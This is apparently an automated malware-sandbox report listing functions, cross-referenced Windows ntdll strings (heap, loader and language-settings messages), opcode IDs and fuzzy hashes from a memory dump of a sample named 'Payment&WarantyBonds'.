                                                                                                                                                                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                                                                                • API String ID: 0-3063724069
                                                                                                                                                                                • Opcode ID: e053ee7e6b12137be78bd57f51b238cdcde3b68e4d95167881738cf6d6bda0fd
                                                                                                                                                                                • Instruction ID: d2070e5e6ecfa9b6139bd95bac2054f0215b3b5cb24eb2958f48ce0eb0dd5253
                                                                                                                                                                                • Opcode Fuzzy Hash: e053ee7e6b12137be78bd57f51b238cdcde3b68e4d95167881738cf6d6bda0fd
                                                                                                                                                                                • Instruction Fuzzy Hash: C6D1CAB2809315AFD721DB59C880BABB7E8AF94718F04492FFB4497270D774D944C7A2
                                                                                                                                                                                Function 014D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                • API String ID: 0-1700792311
                                                                                                                                                                                • Opcode ID: 77bbb6585781cfd8da90a8081b6d0add1dda205e23c6ef2133d36f78c4dcd667
                                                                                                                                                                                • Instruction ID: d0d7203109662c9cfc269e09edea84613866ca2398125836f108e0ddd07775bf
                                                                                                                                                                                • Opcode Fuzzy Hash: 77bbb6585781cfd8da90a8081b6d0add1dda205e23c6ef2133d36f78c4dcd667
                                                                                                                                                                                • Instruction Fuzzy Hash: 67D1CB35600686EFDF22DF69C460AAABBF1FF59710F18805EF9499B362C7349942CB10
                                                                                                                                                                                Function 0141D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0141D2C3
                                                                                                                                                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0141D262
                                                                                                                                                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0141D0CF
                                                                                                                                                                                • @, xrefs: 0141D313
                                                                                                                                                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 0141D196
                                                                                                                                                                                • @, xrefs: 0141D2AF
                                                                                                                                                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0141D146
                                                                                                                                                                                • @, xrefs: 0141D0FD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                                                • API String ID: 0-1356375266
                                                                                                                                                                                • Opcode ID: 3620b013be606c1c3b634918c06914b600a4d4313a7dd27d8fb467b81f9eab51
                                                                                                                                                                                • Instruction ID: f5f70f8214f69912242e9944fc7bdaf3b5a3d9527cc1c274f279acd4aa6b21e1
                                                                                                                                                                                • Opcode Fuzzy Hash: 3620b013be606c1c3b634918c06914b600a4d4313a7dd27d8fb467b81f9eab51
                                                                                                                                                                                • Instruction Fuzzy Hash: 2EA17BB19083069FE721CF65C484B9FBBE8BB94729F00492FE69897260D774D908CB53
                                                                                                                                                                                Function 0141F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 0-523794902
                                                                                                                                                                                • Opcode ID: 9d87b1971a3e61fbfd2a358339f3e72493966371c669e8524fd53c702fa5029d
                                                                                                                                                                                • Instruction ID: 5d2ed630c0decfbb5e190c88f8dea2071b91da523fcdb076ca1b1e0fa3c485e0
                                                                                                                                                                                • Opcode Fuzzy Hash: 9d87b1971a3e61fbfd2a358339f3e72493966371c669e8524fd53c702fa5029d
                                                                                                                                                                                • Instruction Fuzzy Hash: D642F0312143829FD715DF29C484BABBBE5FF98204F184A6EE485CB366D734D84ACB52
                                                                                                                                                                                Function 0143B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                • API String ID: 0-122214566
                                                                                                                                                                                • Opcode ID: 16cebae1e7835fec9f3f309e1a34dd578271f05337e9259c9eab3160cf774c19
                                                                                                                                                                                • Instruction ID: d3ab53078a976711a5e3e9b9ffd29eb9d587c390eb55d868809e5636659a122a
                                                                                                                                                                                • Opcode Fuzzy Hash: 16cebae1e7835fec9f3f309e1a34dd578271f05337e9259c9eab3160cf774c19
                                                                                                                                                                                • Instruction Fuzzy Hash: BBC15931A00216ABDB259F69C880BBFBB65EFA9714F14416FED01EB3B1E7708945C391
                                                                                                                                                                                Function 014563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-792281065
                                                                                                                                                                                • Opcode ID: 116bb20fbfacd9226e81518e80efb0b8990186fd3b63f910591018577d175587
                                                                                                                                                                                • Instruction ID: 73be6e96938dc5e45bd60d5be160becb6f06d182ce75ae329d9aecdad9e922af
                                                                                                                                                                                • Opcode Fuzzy Hash: 116bb20fbfacd9226e81518e80efb0b8990186fd3b63f910591018577d175587
                                                                                                                                                                                • Instruction Fuzzy Hash: EE918A70B003129BEF36DF19D945BAA3FA1BB52B24F56002FE9106B3B2D7B44802C794
                                                                                                                                                                                Function 014CF525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                • API String ID: 0-1745908468
                                                                                                                                                                                • Opcode ID: 4024eebbbc41544e8c24cb0cc1a1a1eb581ac9fde12760cb0eda0ce009f42212
                                                                                                                                                                                • Instruction ID: bc13d2273424e5b2f555afc5abd4d407ce32b69e2dfc406645ccb68d149cfc53
                                                                                                                                                                                • Opcode Fuzzy Hash: 4024eebbbc41544e8c24cb0cc1a1a1eb581ac9fde12760cb0eda0ce009f42212
                                                                                                                                                                                • Instruction Fuzzy Hash: F891E039A00641DFDB12DFA9C440AAABBF2FF69B14F14801FE5559B372C739994ACB10
                                                                                                                                                                                Function 0141645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • apphelp.dll, xrefs: 01416496
                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01479A01
                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 014799F4, 01479A07, 01479A30
                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014799ED
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01479A11, 01479A3A
                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01479A2A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-204845295
                                                                                                                                                                                • Opcode ID: 7c8f1b474c9e584a476e0dbe32777d030ea399987b5de48636f9fe228b350dbf
                                                                                                                                                                                • Instruction ID: 890d4706493bc751ca5a08ee8af25f88387d6667b8d2c4072eb51ca47d0641f1
                                                                                                                                                                                • Opcode Fuzzy Hash: 7c8f1b474c9e584a476e0dbe32777d030ea399987b5de48636f9fe228b350dbf
                                                                                                                                                                                • Instruction Fuzzy Hash: 4D5125712083019FE722EF25D841F9B77E8FB94658F01092FF5959B2B4D670E944CB92
                                                                                                                                                                                Function 0144F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014902E7
                                                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014902BD
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 0149031E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                                                                • Opcode ID: 4f7f43d2fd14debc3cbfa663e3598425c939c8c540142ac82bc0973b8ea94af8
                                                                                                                                                                                • Instruction ID: 82770a62b65fc0f2654f5e6cbf50b80acbe02471511c1a78e3ace046eee606f1
                                                                                                                                                                                • Opcode Fuzzy Hash: 4f7f43d2fd14debc3cbfa663e3598425c939c8c540142ac82bc0973b8ea94af8
                                                                                                                                                                                • Instruction Fuzzy Hash: 86E18B706047429FEB25CF2CC884B2ABBE4AB94314F140A5EF5A58B3F1D775D94ACB42
                                                                                                                                                                                Function 014451EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • WindowsExcludedProcs, xrefs: 0144522A
                                                                                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 0144542B
                                                                                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 01445352
                                                                                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 0144527B
                                                                                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 01445247
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                • API String ID: 0-258546922
                                                                                                                                                                                • Opcode ID: c3e2c5cecba7e172724d66babb6486cf0dbc8b52c090bd1018760a06061b4828
                                                                                                                                                                                • Instruction ID: 07d45f4494bb83eab2c0d617d034af608280da753c0badac997fa948e7d726ae
                                                                                                                                                                                • Opcode Fuzzy Hash: c3e2c5cecba7e172724d66babb6486cf0dbc8b52c090bd1018760a06061b4828
                                                                                                                                                                                • Instruction Fuzzy Hash: BCF13A72D00619EFDF12DF99C980AEFBBB9FF58650F15406BE501EB220D7749A058BA0
                                                                                                                                                                                Function 014370C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 0-3178619729
                                                                                                                                                                                • Opcode ID: 4ea7e609abe81b5743fe2d883628860934349161a04967abb4747b68dd3149ed
                                                                                                                                                                                • Instruction ID: 125c65a47d539a374b70f4df1d7e648ee63f76f2a97f0f1414ae9862086e32f2
                                                                                                                                                                                • Opcode Fuzzy Hash: 4ea7e609abe81b5743fe2d883628860934349161a04967abb4747b68dd3149ed
                                                                                                                                                                                • Instruction Fuzzy Hash: A213A270A00256DFDB25CF69C4907AAFBF1BF98304F14826EE945AB3A1D734A946CF50
                                                                                                                                                                                Function 01431070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 0-3570731704
                                                                                                                                                                                • Opcode ID: 219b3bb942007966f616edda7aaca42479e02ce5406e09b97bdf50f82722f081
                                                                                                                                                                                • Instruction ID: b5a64985865ecfdc9452c61ed50f3f7f782b636ce5d333f503047d0839ff118c
                                                                                                                                                                                • Opcode Fuzzy Hash: 219b3bb942007966f616edda7aaca42479e02ce5406e09b97bdf50f82722f081
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B926C71A00229CFEB25DF19C840FAAB7B5BF89714F0581EAD949AB361D7309E81CF51
                                                                                                                                                                                Function 0142A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                • API String ID: 0-379654539
                                                                                                                                                                                • Opcode ID: 70f4397bec24a792dbbab7321f74d15ae149b30090675f2571b0ce5551800126
                                                                                                                                                                                • Instruction ID: 8d3d1b25b7a3cec206ee42ff5c7d7af947ca35889ad489cecc251ab2b5a02861
                                                                                                                                                                                • Opcode Fuzzy Hash: 70f4397bec24a792dbbab7321f74d15ae149b30090675f2571b0ce5551800126
                                                                                                                                                                                • Instruction Fuzzy Hash: 2AC1A8741083928FD721DF58C144B6BBBE4BF94304F50496BF9968BB61E374C98ACB52
                                                                                                                                                                                Function 01458402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 01458422
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01458421
                                                                                                                                                                                • @, xrefs: 01458591
                                                                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0145855E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-1918872054
                                                                                                                                                                                • Opcode ID: a77c41e02fb70bff44ca3a883d773fb1e0a0dd319e19e48b642bbe4161b937c4
                                                                                                                                                                                • Instruction ID: 6a7f3be9731f60a2f9ab1d366a308d2c03f42dece25aaed240abe4e76ae72117
                                                                                                                                                                                • Opcode Fuzzy Hash: a77c41e02fb70bff44ca3a883d773fb1e0a0dd319e19e48b642bbe4161b937c4
                                                                                                                                                                                • Instruction Fuzzy Hash: 96919F71508346AFD762DF26CC41F6BBAECFB94658F40092FFA8496162E770D904CB62
                                                                                                                                                                                Function 014415F4 Relevance: 5.2, Strings: 4, Instructions: 166COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 0148A59A
                                                                                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 0148A589
                                                                                                                                                                                • LdrpCompleteMapModule, xrefs: 0148A590
                                                                                                                                                                                • MZER, xrefs: 014416E8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$MZER$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                • API String ID: 0-1409021520
                                                                                                                                                                                • Opcode ID: 3195f3b87e56d4632f8185d683a431db9412ae999ae23f044c5f60d2ac85044e
                                                                                                                                                                                • Instruction ID: 1097baddd82e2514e399b0aa55e5e976cdd9e757dd686cc47dccfeff42538194
                                                                                                                                                                                • Opcode Fuzzy Hash: 3195f3b87e56d4632f8185d683a431db9412ae999ae23f044c5f60d2ac85044e
                                                                                                                                                                                • Instruction Fuzzy Hash: 745103706007419BF722DB5DC944B2A7BE4AB50B14F28026BEA569B7F2D7B4F981C740
                                                                                                                                                                                Function 014D11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                                                                                • API String ID: 0-336120773
                                                                                                                                                                                • Opcode ID: 079a36fd548e13e240b61dd3f9b3f4c655c5c7d8208f440ffbb26559d60ed2b5
                                                                                                                                                                                • Instruction ID: 8858ed39c6a0a20426d04175efb569c3a9497b1793fa8c05397b15714f1d4bb0
                                                                                                                                                                                • Opcode Fuzzy Hash: 079a36fd548e13e240b61dd3f9b3f4c655c5c7d8208f440ffbb26559d60ed2b5
                                                                                                                                                                                • Instruction Fuzzy Hash: 4E312F75210101EFDB11DB99C894F6777E9EF18E24F14011BF901EB3B1D672A840CA64
                                                                                                                                                                                Function 0144245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 0148A998
                                                                                                                                                                                • apphelp.dll, xrefs: 01442462
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0148A9A2
                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0148A992
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-176724104
                                                                                                                                                                                • Opcode ID: 55d8b6681495bff6e75f32e95acf64b5f302f04da27672a0df82e38c40ed4e5f
                                                                                                                                                                                • Instruction ID: 92ee43c7718be0fde8c007ff03d9bc5a618afc364a88b21349369ff5eadd2211
                                                                                                                                                                                • Opcode Fuzzy Hash: 55d8b6681495bff6e75f32e95acf64b5f302f04da27672a0df82e38c40ed4e5f
                                                                                                                                                                                • Instruction Fuzzy Hash: A0312975600202ABD732AF59D885E6EBBB4FB84714F27006FF9106B365C7F45986D740
                                                                                                                                                                                Function 01419148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                • API String ID: 0-1391187441
                                                                                                                                                                                • Opcode ID: 2ebeb61ca4639e5f4e1f0e1046a6bb71a632caf970ab02d7572be8ca8a3b652b
                                                                                                                                                                                • Instruction ID: dc4bea77a773db2c94e39aeeea364c1e8ff42cafa4e02b89b649dee41451b910
                                                                                                                                                                                • Opcode Fuzzy Hash: 2ebeb61ca4639e5f4e1f0e1046a6bb71a632caf970ab02d7572be8ca8a3b652b
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C31D236A00105EFDB01EB5AC888FEBB7F9EF54624F14406BE914A72A5D770ED81CA60
                                                                                                                                                                                Function 01421460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • HEAP: , xrefs: 01421596
                                                                                                                                                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01421728
                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 01421712
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 0-3178619729
                                                                                                                                                                                • Opcode ID: e7ed826763d07aa7f2213ebbce0d4b568e7cce58438bf5c23d37bf09e5a93bab
                                                                                                                                                                                • Instruction ID: 3922c0326f07607634ccca3443c1bb2775f44ea75c9bd73e3a5488401b7eaee0
                                                                                                                                                                                • Opcode Fuzzy Hash: e7ed826763d07aa7f2213ebbce0d4b568e7cce58438bf5c23d37bf09e5a93bab
                                                                                                                                                                                • Instruction Fuzzy Hash: 21E1F130A042519BDB25CF28C491BBBBBF1AF88700F58846FE596CB366D734E985CB50
                                                                                                                                                                                Function 0141A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                                                                • Opcode ID: f7bb902222e61b06f82142f7c5b00adb0dbbf43d9bd4f745db61a22576b16a20
                                                                                                                                                                                • Instruction ID: b1b5d1e57e3a1acba6c891f8c2535b68f57f2e159be4398eccd1310e49ed8676
                                                                                                                                                                                • Opcode Fuzzy Hash: f7bb902222e61b06f82142f7c5b00adb0dbbf43d9bd4f745db61a22576b16a20
                                                                                                                                                                                • Instruction Fuzzy Hash: EEA16F7191122A9BDB31DF64CC88BEAB7B8EF54714F1001EBE909A7260D7359E85CF50
                                                                                                                                                                                Function 014A7410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
